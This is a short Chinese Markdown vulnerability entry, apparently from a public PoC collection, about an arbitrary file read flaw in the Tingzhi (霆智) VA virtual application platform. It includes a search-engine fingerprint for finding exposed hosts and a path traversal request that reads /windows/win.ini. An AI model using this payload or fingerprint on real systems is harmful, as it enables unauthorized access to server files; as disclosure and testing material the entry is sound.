Awesome-POC/Web应用漏洞/霆智科技 VA虚拟应用平台 任意文件读取漏洞.md
2023-08-28 15:55:36 +08:00

29 lines
568 B
Markdown

# 霆智科技 VA虚拟应用平台 任意文件读取漏洞
## 漏洞描述
霆智科技 VA虚拟应用平台 存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感信息
## 漏洞影响
霆智科技 VA虚拟应用平台
## 网络测绘
```
body="EAA益和应用接入系统"
```
## 漏洞复现
登陆页面
![image-20230704111747376](./images/image-20230704111747376.png)
验证POC
```
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
```
![image-20230704112349037](./images/image-20230704112349037.png)